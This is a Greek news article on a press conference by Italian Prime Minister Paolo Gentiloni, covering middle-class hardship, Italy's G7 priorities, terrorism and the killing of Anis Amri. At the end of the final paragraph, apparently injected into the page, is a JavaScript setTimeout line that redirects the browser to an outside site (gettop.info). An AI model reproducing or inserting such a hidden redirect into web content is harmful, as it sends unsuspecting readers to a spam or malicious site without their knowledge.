Τζεντιλόνι: Ουσιαστικά προβλήματα για μεγάλο μέρος της μέσης αστικής τάξης

0
12

 

Κατά τη διάρκεια συνέντευξης Τύπου προς τον ιταλικό Τύπο, ο πρωθυπουργός της χώρας Πάολο Τζεντιλόνι ανέφερε πως «δεν αγνοούμε ότι μεγάλο μέρος της μέσης αστικής τάξης μας αντιμετωπίζει ουσιαστικά προβλήματα. Δεν αστειευθήκαμε, δεν τελειώσαμε, η πορεία των μεταρρυθμίσεων συνεχίζεται». Ο Ιταλός πρωθυπουργός κατέστησε σαφές ότι «η εργασία και οι νέοι είναι, στη φάση αυτή, οι λέξεις-κλειδιά, διότι η απόσταση ανάμεσα στις προσπάθειες που καταβλήθηκαν και στην υφιστάμενη κατάσταση είναι ακόμη μεγάλη».

Παράλληλα, υπογράμμισε ότι η Ιταλία, η οποία αναλαμβάνει από την 1η Ιανουαρίου του 2017 την προεδρία του G7, θέτει δυο κύριους στόχους: «Την προώθηση του κεντρικού ρόλου της Μεσογείου και μια πραγματική συνεισφορά ώστε να αλλάξουν οι σχέσεις με τη Ρωσία και να απομακρύνουμε ιδέες οι οποίες θα μπορούσαν να μας βάλουν σε πλαίσια που χαρακτήριζαν τον ψυχρό πόλεμο».

Σε σχέση με την απειλή της τρομοκρατίας, ο Τζεντιλόνι τόνισε ότι «η κυβέρνησή του θέλει να υπερασπισθεί την ασφάλεια, για να μπορέσει να ηττηθεί ο φόβος». Παραδέχθηκε ότι η Ιταλία, λόγω της γεωγραφικής της θέσης, είναι εκτεθειμένη, αλλά υπογράμμισε ότι «ως χώρα, κατάφερε να εξασφαλίσει ένα επίπεδο συνύπαρξης των διαφόρων κοινοτήτων, λιγότερο δραματικό από εκείνο άλλων χωρών».

Κατά την άποψη του Τζεντιλόνι «πρόκειται, φυσικά, για έξωθεν απειλές, αλλά πρέπει να προσέξουμε, διότι σε πολλές περιπτώσεις υπάρχουν άτομα που ασπάζονται εξτρεμιστικές θέσεις μέσα στις φυλακές της Ιταλίας, ή και σε συνοικίες των πόλεών της».

Αναφερόμενος στην εκτέλεση του Άνις Άμρι από δυο αστυνομικούς λίγο έξω από το Μιλάνο, ο επικεφαλής της ιταλικής κυβέρνησης τόνισε ότι «μέχρι αυτή τη στιγμή, δεν προκύπτει να διέθετε ιδιαίτερα δίκτυα υποστήριξης εντός των ιταλικών συνόρων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here